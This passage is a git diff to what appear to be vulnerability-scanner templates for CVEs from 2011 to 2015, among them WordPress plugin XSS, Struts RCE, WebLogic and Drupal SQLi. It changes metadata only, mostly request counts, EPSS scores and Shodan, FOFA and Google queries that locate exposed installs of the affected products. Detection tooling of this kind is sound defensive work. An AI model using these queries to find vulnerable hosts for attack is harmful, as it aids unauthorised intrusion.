http(1) && http(2) http: diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index 2b7662c648..8f220b05ad 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -22,12 +22,11 @@ info: epss-percentile: 0.61346 cpe: cpe:2.3:a:skysa:skysa_app_bar_integration_plugin:*:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: skysa - product: skysa_app_bar_integration_plugin - google-query: inurl:"/wp-content/plugins/skysa-official/" + product: "skysa_app_bar_integration_plugin" + google-query: "inurl:\"/wp-content/plugins/skysa-official/\"" tags: cve,cve2011,wordpress,xss,wp-plugin,skysa - flow: http(1) && http(2) http: diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index f1a4e9b17b..cf2c318187 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -24,10 +24,10 @@ info: epss-percentile: 0.74451 cpe: cpe:2.3:a:clickdesk:clickdesk_live_support-live_chat_plugin:2.0:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: clickdesk - product: clickdesk_live_support-live_chat_plugin - google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/" + product: "clickdesk_live_support-live_chat_plugin" + google-query: "inurl:\"/wp-content/plugins/clickdesk-live-support-chat/\"" tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk flow: http(1) && http(2) diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 8ef215d300..8793d25fc2 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -23,10 +23,10 @@ info: epss-percentile: 0.75781 cpe: cpe:2.3:a:featurific_for_wordpress_project:featurific-for-wordpress:1.6.2:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: featurific_for_wordpress_project - product: featurific-for-wordpress - google-query: inurl:"/wp-content/plugins/featurific-for-wordpress" + max-request: 2 + vendor: "featurific_for_wordpress_project" + product: "featurific-for-wordpress" + google-query: "inurl:\"/wp-content/plugins/featurific-for-wordpress\"" tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project flow: http(1) && http(2) diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index 357b300c5a..fd3f0db7f6 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -26,8 +26,14 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: http.html:"apache struts" - fofa-query: body="struts problem report" + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve,cve2012,apache,rce,struts,java,edb diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index 4323081301..73e0f5e6ae 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -29,8 +29,15 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: html:"Struts Problem Report" - fofa-query: body="struts problem report" + shodan-query: + - html:"Struts Problem Report" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + - http.html:"apache struts" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve,cve2012,ognl,injection,edb,apache,struts variables: diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index 57a2db83c7..f0e1115c83 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -24,10 +24,10 @@ info: epss-percentile: 0.60514 cpe: cpe:2.3:a:attenzione:yousaytoo:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: attenzione product: yousaytoo - google-query: inurl:"/wp-content/plugins/yousaytoo-auto-publishing-plugin" + google-query: "inurl:\"/wp-content/plugins/yousaytoo-auto-publishing-plugin\"" tags: cve,cve2012,wp-plugin,packetstorm,wordpress,xss,attenzione flow: http(1) && http(2) diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index 286a713a33..a27467581e 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -27,8 +27,15 @@ info: max-request: 1 vendor: openemr product: openemr - fofa-query: icon_hash=1971268439 - shodan-query: http.html:"openemr" + shodan-query: + - http.html:"openemr" + - http.title:"openemr" + - http.favicon.hash:1971268439 + fofa-query: + - icon_hash=1971268439 + - body="openemr" + - title="openemr" + - app="openemr" google-query: intitle:"openemr" tags: cve,cve2012,lfi,openemr,traversal,edb diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index 5426e57f12..ca3ca13532 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -22,10 +22,10 @@ info: epss-percentile: 0.82867 cpe: cpe:2.3:a:timely:all-in-one_event_calendar:1.4:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: timely - product: all-in-one_event_calendar - google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar" + product: "all-in-one_event_calendar" + google-query: "inurl:\"/wp-content/plugins/all-in-one-event-calendar\"" tags: cve,cve2012,wordpress,xss,wp-plugin,timely flow: http(1) && http(2) diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index e3f4c43eca..37f9bbe534 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -24,9 +24,9 @@ info: epss-percentile: 0.84417 cpe: cpe:2.3:a:mnt-tech:wp-facethumb:0.1:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: mnt-tech - product: wp-facethumb + max-request: 2 + vendor: "mnt-tech" + product: "wp-facethumb" tags: cve,cve2012,packetstorm,wordpress,xss,wp-plugin,mnt-tech flow: http(1) && http(2) diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index 2f32796650..0c29ca82d9 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -30,8 +30,12 @@ info: max-request: 2 vendor: oracle product: fusion_middleware - shodan-query: http.title:"weblogic" - fofa-query: title="weblogic" + shodan-query: + - http.title:"weblogic" + - http.html:"weblogic application server" + fofa-query: + - title="weblogic" + - body="weblogic application server" google-query: intitle:"weblogic" tags: cve,cve2012,oracle,rce,edb diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml index b1dc2b670f..23fac3c9ac 100644 --- a/http/cves/2012/CVE-2012-4032.yaml +++ b/http/cves/2012/CVE-2012-4032.yaml @@ -28,7 +28,11 @@ info: max-request: 1 vendor: websitepanel product: websitepanel - shodan-query: title:"WebsitePanel" html:"login" + shodan-query: + - title:"WebsitePanel" html:"login" + - http.title:"websitepanel" html:"login" + fofa-query: title="websitepanel" html:"login" + google-query: intitle:"websitepanel" html:"login" tags: cve,cve2012,packetstorm,redirect,websitepanel,authenticated http: diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index a6e3c72ed6..9c0290739d 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -23,9 +23,9 @@ info: epss-percentile: 0.59564 cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:0.9.2:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: mf_gig_calendar_project - product: mf_gig_calendar + max-request: 2 + vendor: "mf_gig_calendar_project" + product: "mf_gig_calendar" tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project flow: http(1) && http(2) diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 27efb88ce1..665ac342d1 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: mysqldumper product: mysqldumper - tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper + tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper,xss http: - method: GET diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index f82681390a..7d235fb8b9 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -24,10 +24,10 @@ info: epss-percentile: 0.65097 cpe: cpe:2.3:a:ppfeufer:2-click-social-media-buttons:*:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: ppfeufer - product: 2-click-social-media-buttons - google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons" + product: "2-click-social-media-buttons" + google-query: "inurl:\"/wp-content/plugins/2-click-socialmedia-buttons\"" tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,ppfeufer flow: http(1) && http(2) diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index b7c2900d20..029665f8ca 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -24,12 +24,12 @@ info: epss-percentile: 0.82559 cpe: cpe:2.3:a:mikejolley:download_monitor:3.3.5.7:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: mikejolley - product: download_monitor + product: "download_monitor" framework: wordpress - shodan-query: http.html:"/wp-content/plugins/download-monitor/" - fofa-query: body="/wp-content/plugins/download-monitor/" + shodan-query: "http.html:\"/wp-content/plugins/download-monitor/\"" + fofa-query: "body=\"/wp-content/plugins/download-monitor/\"" tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley flow: http(1) && http(2) diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index 5d5c070da4..75264eca72 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2012-4940 cwe-id: CWE-22 epss-score: 0.16414 - epss-percentile: 0.95527 + epss-percentile: 0.95998 cpe: cpe:2.3:a:gecad:axigen_free_mail_server:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index 36789d4340..a764faa850 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -24,9 +24,9 @@ info: epss-percentile: 0.8837 cpe: cpe:2.3:a:wordpress_integrator_project:wordpress_integrator:1.32:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: wordpress_integrator_project - product: wordpress_integrator + max-request: 2 + vendor: "wordpress_integrator_project" + product: "wordpress_integrator" tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project flow: http(1) && http(2) diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index a7dce5184f..18bda7acf5 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -26,8 +26,14 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: http.html:"apache struts" - fofa-query: body="struts problem report" + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve2013,cve,apache,rce,struts,ognl diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index 742f976a69..9457daca56 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml @@ -26,8 +26,14 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: http.html:"apache struts" - fofa-query: body="struts problem report" + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve2013,cve,apache,redirect,struts,edb diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index 0898a2f4d1..c878a37996 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -26,8 +26,14 @@ info: max-request: 9 vendor: apache product: struts - shodan-query: http.html:"apache struts" - fofa-query: body="struts problem report" + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve2013,cve,rce,struts,apache,ognl,kev diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 5a20bcae54..22e158038f 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -23,10 +23,10 @@ info: epss-percentile: 0.59874 cpe: cpe:2.3:a:roberta_bramski:uploader:1.0.4:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: roberta_bramski + max-request: 2 + vendor: "roberta_bramski" product: uploader - google-query: inurl:"/wp-content/plugins/uploader" + google-query: "inurl:\"/wp-content/plugins/uploader\"" tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski,intrusive flow: http(1) && http(2) diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index 01c044e875..7449461487 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -24,10 +24,10 @@ info: epss-percentile: 0.76703 cpe: cpe:2.3:a:wptrafficanalyzer:trafficanalyzer:1.0.0:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: wptrafficanalyzer product: trafficanalyzer - google-query: inurl:"/wp-content/plugins/trafficanalyzer" + google-query: "inurl:\"/wp-content/plugins/trafficanalyzer\"" tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer flow: http(1) && http(2) diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index 72ec0ae855..7b0d6009d7 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -25,8 +25,12 @@ info: max-request: 10 vendor: oracle product: fusion_middleware - shodan-query: http.title:"weblogic" - fofa-query: title="weblogic" + shodan-query: + - http.title:"weblogic" + - http.html:"weblogic application server" + fofa-query: + - title="weblogic" + - body="weblogic application server" google-query: intitle:"weblogic" tags: cve,cve2013,edb,lfi,javafaces,oracle diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 44204bde37..f7c0f63fdb 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -24,10 +24,10 @@ info: epss-percentile: 0.85273 cpe: cpe:2.3:a:anshul_sharma:category-grid-view-gallery:2.3.1:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: anshul_sharma - product: category-grid-view-gallery - google-query: inurl:"/wp-content/plugins/category-grid-view-gallery" + max-request: 2 + vendor: "anshul_sharma" + product: "category-grid-view-gallery" + google-query: "inurl:\"/wp-content/plugins/category-grid-view-gallery\"" tags: cve2013,cve,seclists,packetstorm,wordpress,xss,wp-plugin,anshul_sharma flow: http(1) && http(2) diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index b31311fc5f..5571d2d703 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -23,10 +23,10 @@ info: epss-percentile: 0.85273 cpe: cpe:2.3:a:cory_lamle:duplicator:*:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: cory_lamle + max-request: 2 + vendor: "cory_lamle" product: duplicator - google-query: inurl:"/wp-content/plugins/duplicator" + google-query: "inurl:\"/wp-content/plugins/duplicator\"" tags: cve2013,cve,seclists,wordpress,xss,wp-plugin,packetstorm,cory_lamle flow: http(1) && http(2) diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index d18c3a90a6..e0d2283530 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -27,9 +27,15 @@ info: max-request: 2 vendor: synacor product: zimbra_collaboration_suite - shodan-query: http.title:"zimbra collaboration suite" - fofa-query: title="zimbra web client sign in" - google-query: intitle:"zimbra collaboration suite" + shodan-query: + - http.title:"zimbra collaboration suite" + - http.title:"zimbra web client sign in" + fofa-query: + - title="zimbra web client sign in" + - title="zimbra collaboration suite" + google-query: + - intitle:"zimbra collaboration suite" + - intitle:"zimbra web client sign in" tags: cve2013,cve,packetstorm,zimbra,lfi,edb,synacor http: diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 1eef11da3d..39dcfcb2c8 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-3206 cwe-id: CWE-20 epss-score: 0.2561 - epss-percentile: 0.96594 + epss-percentile: 0.96696 cpe: cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2014/CVE-2014-3704.yaml b/http/cves/2014/CVE-2014-3704.yaml index 5882453bd0..4a998c9e31 100644 --- a/http/cves/2014/CVE-2014-3704.yaml +++ b/http/cves/2014/CVE-2014-3704.yaml @@ -21,14 +21,16 @@ info: cvss-score: 7.5 cve-id: CVE-2014-3704 cwe-id: CWE-89 - epss-score: 0.97537 + epss-score: 0.9753 epss-percentile: 0.99992 cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: drupal product: drupal - shodan-query: http.component:"drupal" + shodan-query: + - http.component:"drupal" + - cpe:"cpe:2.3:a:drupal:drupal" tags: cve2014,cve,edb,drupal,sqli variables: num: "999999999" diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index 6eeb36f740..3bfcc78127 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -27,8 +27,13 @@ info: max-request: 1 vendor: oracle product: fusion_middleware - shodan-query: title:"Weblogic" - fofa-query: title="weblogic" + shodan-query: + - title:"Weblogic" + - http.title:"weblogic" + - http.html:"weblogic application server" + fofa-query: + - title="weblogic" + - body="weblogic application server" google-query: intitle:"weblogic" tags: cve2014,cve,seclists,weblogic,oracle,ssrf,oast,xss diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index 8ed5d7e85b..32eb83f5e9 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -21,13 +21,12 @@ info: epss-percentile: 0.50288 cpe: cpe:2.3:a:activehelper:activehelper_livehelp_live_chat:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: activehelper - product: activehelper_livehelp_live_chat + product: "activehelper_livehelp_live_chat" framework: wordpress - google-query: inurl:"/wp-content/plugins/activehelper-livehelp" + google-query: "inurl:\"/wp-content/plugins/activehelper-livehelp\"" tags: cve2014,cve,wordpress,xss,wp-plugin,activehelper - flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index f66829fb81..788487855f 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -23,12 +23,11 @@ info: epss-percentile: 0.48664 cpe: cpe:2.3:a:import_legacy_media_project:import_legacy_media:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: import_legacy_media_project - product: import_legacy_media + max-request: 2 + vendor: "import_legacy_media_project" + product: "import_legacy_media" framework: wordpress tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,import_legacy_media_project - flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index b2ad8dcb63..6f55fe70fd 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -24,11 +24,13 @@ info: epss-percentile: 0.50948 cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: katz - product: infusionsoft_gravity_forms + product: "infusionsoft_gravity_forms" framework: wordpress - google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/" + google-query: + - "inurl:\"/wp-content/plugins/infusionsoft/Infusionsoft/\"" + - inurl:"/wp-content/plugins/infusionsoft/infusionsoft/" tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,katz flow: http(1) && http(2) diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index cb9287e5f9..55155f129a 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -23,8 +23,8 @@ info: epss-percentile: 0.48718 cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: movies_project + max-request: 2 + vendor: "movies_project" product: movies framework: wordpress tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,movies_project diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index d438956a11..b44eafeb60 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -13,13 +13,14 @@ info: - https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb - https://nvd.nist.gov/vuln/detail/CVE-2014-4544 - http://codevigilant.com/disclosure/wp-plugin-podcast-channels-a3-cross-site-scripting-xss + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2014-4544 cwe-id: CWE-79 epss-score: 0.00118 - epss-percentile: 0.45595 + epss-percentile: 0.45869 cpe: cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index 64a4b59675..acd2614a2e 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -22,13 +22,12 @@ info: epss-percentile: 0.48556 cpe: cpe:2.3:a:visualshortcodes:ninja:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: visualshortcodes product: ninja framework: wordpress - google-query: inurl:"/wp-content/plugins/shortcode-ninja" + google-query: "inurl:\"/wp-content/plugins/shortcode-ninja\"" tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,visualshortcodes - flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index 5819de6277..e71bb8dce9 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -23,9 +23,9 @@ info: epss-percentile: 0.48718 cpe: cpe:2.3:a:cybercompany:swipehq-payment-gateway-woocommerce:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: cybercompany - product: swipehq-payment-gateway-woocommerce + product: "swipehq-payment-gateway-woocommerce" framework: wordpress tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,woocommerce,unauth,cybercompany flow: http(1) && http(2) diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index ca0f4e8917..7abbea3f83 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -23,9 +23,9 @@ info: epss-percentile: 0.40792 cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: ultimate-weather_project - product: ultimate-weather + max-request: 2 + vendor: "ultimate-weather_project" + product: "ultimate-weather" framework: wordpress tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project flow: http(1) && http(2) diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml index 51756c4c86..be10c4aaba 100644 --- a/http/cves/2014/CVE-2014-4592.yaml +++ b/http/cves/2014/CVE-2014-4592.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-4592 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47838 + epss-percentile: 0.48718 cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 92a45f5fbf..2158f2d193 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-5368 cwe-id: CWE-22 epss-score: 0.09191 - epss-percentile: 0.94512 + epss-percentile: 0.94648 cpe: cpe:2.3:a:wp_content_source_control_project:wp_content_source_control:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index 8a02870d18..267fcd7ff6 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-6308 cwe-id: CWE-22 epss-score: 0.0922 - epss-percentile: 0.94519 + epss-percentile: 0.94654 cpe: cpe:2.3:a:osclass:osclass:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index 57bc690ac5..1e7fbdb48c 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -28,9 +28,12 @@ info: max-request: 1 vendor: gogits product: gogs - shodan-query: title:"Sign In - Gogs" - google-query: intitle:"sign in - gogs" + shodan-query: + - title:"Sign In - Gogs" + - http.title:"sign in - gogs" + - cpe:"cpe:2.3:a:gogs:gogs" fofa-query: title="sign in - gogs" + google-query: intitle:"sign in - gogs" tags: cve2014,cve,gogs,seclists,packetstorm,edb,sqli,gogits http: diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index 2593cc8aa0..9431767733 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -24,13 +24,12 @@ info: epss-percentile: 0.96912 cpe: cpe:2.3:a:digitalzoomstudio:video_gallery:-:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: digitalzoomstudio - product: video_gallery + product: "video_gallery" framework: wordpress - google-query: inurl:"/wp-content/plugins/dzs-videogallery" + google-query: "inurl:\"/wp-content/plugins/dzs-videogallery\"" tags: cve2014,cve,wordpress,xss,wp-plugin,seclists,digitalzoomstudio - flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml index 1f1d88f537..9c74b4b5e7 100644 --- a/http/cves/2014/CVE-2014-9180.yaml +++ b/http/cves/2014/CVE-2014-9180.yaml @@ -24,7 +24,10 @@ info: max-request: 1 vendor: eleanor-cms product: eleanor_cms - shodan-query: html:"eleanor" + shodan-query: + - html:"eleanor" + - http.html:"eleanor" + - cpe:"cpe:2.3:a:eleanor-cms:eleanor_cms" fofa-query: body="eleanor" tags: cve2014,cve,packetstorm,eleanor,cms,redirect,eleanor-cms diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index 4ed01ed159..075ca2c9f5 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -27,9 +27,18 @@ info: max-request: 2 vendor: icewarp product: mail_server - shodan-query: title:"icewarp" - fofa-query: title="icewarp server administration" - google-query: intitle:"icewarp server administration" + shodan-query: + - title:"icewarp" + - http.title:"icewarp server administration" + - http.title:"icewarp" + - cpe:"cpe:2.3:a:icewarp:mail_server" + fofa-query: + - title="icewarp server administration" + - title="icewarp" + google-query: + - intitle:"icewarp server administration" + - intitle:"icewarp" + - powered by icewarp 10.4.4 tags: cve2015,cve,lfi,mail,packetstorm,icewarp http: diff --git a/http/cves/2015/CVE-2015-1635.yaml b/http/cves/2015/CVE-2015-1635.yaml index a3614de746..e7743b1edb 100644 --- a/http/cves/2015/CVE-2015-1635.yaml +++ 